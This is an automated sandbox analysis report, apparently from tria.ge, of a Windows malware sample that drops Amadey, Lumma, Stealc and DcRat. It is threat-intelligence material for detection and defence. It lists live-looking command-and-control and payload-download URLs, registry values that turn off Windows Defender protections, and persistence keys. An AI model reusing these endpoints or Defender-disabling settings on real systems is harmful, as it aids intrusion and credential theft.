Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
10/03/2025, 15:51
Static task
static1
Behavioral task
behavioral1
Sample
57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe
Resource
win10v2004-20250217-en
General
-
Target
57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe
-
Size
938KB
-
MD5
afdfccd956ad7ac9e185bc503802ff22
-
SHA1
9708fd1a5ee5b4728c67a6b2b5687e012dea98a3
-
SHA256
57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700
-
SHA512
1fe8a89524a2e35d2dd53550fcbccf24429a6c6e8be4d40e9e99daf735dafc505dbee08ae74d9cc2c58eef5517c7865428d955483904af7d37ed9ffd91666a70
-
SSDEEP
24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8a4gu:CTvC/MTQYxsWR7a4g
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://absoulpushx.life/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
https://1sterpickced.digital/api
https://narisechairedd.shop/api
https://2.sterpickced.digital/api
https://defaulemot.run/api
https://featureccus.shop/api
https://zmrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://htardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://latchclan.shop/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/3360-739-0x0000000000A60000-0x0000000000EB0000-memory.dmp healer behavioral1/memory/3360-740-0x0000000000A60000-0x0000000000EB0000-memory.dmp healer -
Healer family
-
Lumma family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\SSD.exe," reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 9b50395388.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 9b50395388.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 9b50395388.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 9b50395388.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 9b50395388.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 9b50395388.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 9b50395388.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 9b50395388.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 9b50395388.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 9b50395388.exe -
Stealc family
-
DCRat payload 4 IoCs
resource yara_rule behavioral1/files/0x000400000001da69-1061.dat family_dcrat_v2 behavioral1/memory/4976-1063-0x0000000000B30000-0x0000000000BBA000-memory.dmp family_dcrat_v2 behavioral1/memory/4528-1141-0x0000000000D10000-0x0000000000D9A000-memory.dmp family_dcrat_v2 behavioral1/memory/1608-1349-0x00000000003F0000-0x000000000047A000-memory.dmp family_dcrat_v2 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 27264e0632.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0dce80a750.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2b06f6fb99.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cuFIzyH.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9b50395388.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ed16143bb3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5aba4d79e5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ac4788203f.exe -
Blocklisted process makes network request 5 IoCs
flow pid Process 4 2880 powershell.exe 27 2948 wscript.exe 29 1356 powershell.exe 31 2072 powershell.exe 188 3900 wscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 1356 powershell.exe 2072 powershell.exe 2880 powershell.exe 2732 powershell.exe 2996 powershell.exe 2824 powershell.exe 1100 powershell.exe 2960 powershell.exe -
Downloads MZ/PE file 25 IoCs
flow pid Process 131 1132 rapes.exe 131 1132 rapes.exe 131 1132 rapes.exe 131 1132 rapes.exe 150 4924 BitLockerToGo.exe 4 2880 powershell.exe 29 1356 powershell.exe 35 1132 rapes.exe 35 1132 rapes.exe 35 1132 rapes.exe 35 1132 rapes.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 188 3900 wscript.exe 31 2072 powershell.exe 7 1132 rapes.exe 7 1132 rapes.exe 7 1132 rapes.exe 7 1132 rapes.exe 7 1132 rapes.exe 27 2948 wscript.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 972 chrome.exe 2504 chrome.exe 3536 chrome.exe 3812 chrome.exe 3924 chrome.exe 3932 chrome.exe 1956 chrome.exe 2700 chrome.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 27264e0632.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0dce80a750.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9b50395388.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ed16143bb3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cuFIzyH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cuFIzyH.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0dce80a750.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9b50395388.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ed16143bb3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ac4788203f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2b06f6fb99.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5aba4d79e5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 27264e0632.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2b06f6fb99.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5aba4d79e5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ac4788203f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe cmd.exe -
Executes dropped EXE 42 IoCs
pid Process 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 1132 rapes.exe 2480 cuFIzyH.exe 1812 iZ73hNr.exe 3004 iZ73hNr.exe 2264 P2SXMuh.exe 2616 P2SXMuh.exe 2992 0uzaP1a.exe 1092 Security Protection Windows.pif 2276 db7e2fd40a.exe 2292 OpenCL.pif 352 TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE 1120 OpenCL.pif 1960 483d2fa8a0d53818306efeb32d3.exe 1696 27264e0632.exe 3044 0dce80a750.exe 1588 d1deb9a751.exe 3360 9b50395388.exe 3328 6z1l5Yn.exe 4784 8p5Lrev.exe 4824 8p5Lrev.exe 4948 4p0OMTuhea.exe 4976 abaMpGYmAU.exe 4368 2b06f6fb99.exe 4528 firefox.exe 3792 ed16143bb3.exe 3828 5aba4d79e5.exe 3620 ac4788203f.exe 5068 4022269ebc.exe 5108 4022269ebc.exe 4284 8p5Lrev.exe 4324 8p5Lrev.exe 2784 8p5Lrev.exe 320 1j3kLiDowh.exe 1608 T9wBxU6hjy.exe 4100 6z1l5Yn.exe 4936 0uzaP1a.exe 3944 P2SXMuh.exe 3572 P2SXMuh.exe 1548 Security Protection Windows.pif 4044 iZ73hNr.exe 4944 iZ73hNr.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine cuFIzyH.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine ed16143bb3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 5aba4d79e5.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine ac4788203f.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 27264e0632.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 0dce80a750.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 9b50395388.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 2b06f6fb99.exe -
Loads dropped DLL 64 IoCs
pid Process 2880 powershell.exe 2880 powershell.exe 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1812 iZ73hNr.exe 2472 WerFault.exe 2472 WerFault.exe 2472 WerFault.exe 1416 WerFault.exe 1416 WerFault.exe 1416 WerFault.exe 1132 rapes.exe 1132 rapes.exe 2264 P2SXMuh.exe 1132 rapes.exe 1132 rapes.exe 2948 wscript.exe 2948 wscript.exe 1132 rapes.exe 2032 cmd.exe 1356 powershell.exe 1356 powershell.exe 584 cmd.exe 2072 powershell.exe 2072 powershell.exe 1132 rapes.exe 1132 rapes.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 4784 8p5Lrev.exe 4824 8p5Lrev.exe 4824 8p5Lrev.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 1132 rapes.exe 1132 rapes.exe 4692 WerFault.exe 4692 WerFault.exe 4692 WerFault.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 5068 4022269ebc.exe 1108 WerFault.exe 1108 WerFault.exe 1108 WerFault.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 9b50395388.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 9b50395388.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\d1deb9a751.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10168030101\\d1deb9a751.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\9b50395388.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10168040101\\9b50395388.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\db7e2fd40a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10167640101\\db7e2fd40a.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10167650121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\27264e0632.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10168010101\\27264e0632.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\0dce80a750.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10168020101\\0dce80a750.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0005000000019cca-204.dat autoit_exe behavioral1/files/0x000400000001cc8a-576.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 1132 rapes.exe 2480 cuFIzyH.exe 352 TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE 1960 483d2fa8a0d53818306efeb32d3.exe 1696 27264e0632.exe 3044 0dce80a750.exe 3360 9b50395388.exe 4368 2b06f6fb99.exe 3792 ed16143bb3.exe 3828 5aba4d79e5.exe 3620 ac4788203f.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 1812 set thread context of 3004 1812 iZ73hNr.exe 42 PID 2264 set thread context of 2616 2264 P2SXMuh.exe 48 PID 4784 set thread context of 4824 4784 8p5Lrev.exe 135 PID 3792 set thread context of 4924 3792 ed16143bb3.exe 147 PID 5068 set thread context of 5108 5068 4022269ebc.exe 151 PID 4284 set thread context of 2784 4284 8p5Lrev.exe 157 PID 3620 set thread context of 4392 3620 ac4788203f.exe 160 PID 3944 set thread context of 3572 3944 P2SXMuh.exe 178 PID 4044 set thread context of 4944 4044 iZ73hNr.exe 184 -
resource yara_rule behavioral1/files/0x0005000000019926-168.dat upx behavioral1/memory/2992-180-0x00000000001D0000-0x000000000046C000-memory.dmp upx behavioral1/memory/2992-182-0x00000000001D0000-0x000000000046C000-memory.dmp upx behavioral1/files/0x0005000000019f8a-190.dat upx behavioral1/memory/1092-198-0x0000000000800000-0x0000000000CA6000-memory.dmp upx behavioral1/memory/1092-286-0x0000000000800000-0x0000000000CA6000-memory.dmp upx behavioral1/memory/1092-300-0x0000000000800000-0x0000000000CA6000-memory.dmp upx behavioral1/memory/1092-754-0x0000000000800000-0x0000000000CA6000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Mail\it-IT\lsm.exe abaMpGYmAU.exe File created C:\Program Files (x86)\Windows Mail\it-IT\101b941d020240 abaMpGYmAU.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE File created C:\Windows\DigitalLocker\it-IT\firefox.exe abaMpGYmAU.exe File created C:\Windows\DigitalLocker\it-IT\0fc223bdacedc3 abaMpGYmAU.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 2472 3004 WerFault.exe 42 1416 2480 WerFault.exe 39 2172 1696 WerFault.exe 84 4692 4368 WerFault.exe 142 1108 5068 WerFault.exe 150 4220 5108 WerFault.exe 151 3700 4944 WerFault.exe 184 -
System Location Discovery: System Language Discovery 1 TTPs 63 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed16143bb3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d1deb9a751.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language db7e2fd40a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iZ73hNr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4022269ebc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8p5Lrev.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6z1l5Yn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8p5Lrev.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 27264e0632.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8p5Lrev.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2b06f6fb99.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0dce80a750.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8p5Lrev.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P2SXMuh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P2SXMuh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iZ73hNr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iZ73hNr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language d1deb9a751.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage d1deb9a751.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P2SXMuh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cuFIzyH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P2SXMuh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6z1l5Yn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5aba4d79e5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4022269ebc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac4788203f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iZ73hNr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9b50395388.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3412 PING.EXE 4128 PING.EXE 3328 cmd.exe 4876 PING.EXE 4092 cmd.exe 3560 PING.EXE -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 0dce80a750.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 0dce80a750.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2748 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 6 IoCs
pid Process 4764 taskkill.exe 764 taskkill.exe 1936 taskkill.exe 2172 taskkill.exe 1224 taskkill.exe 2692 taskkill.exe -
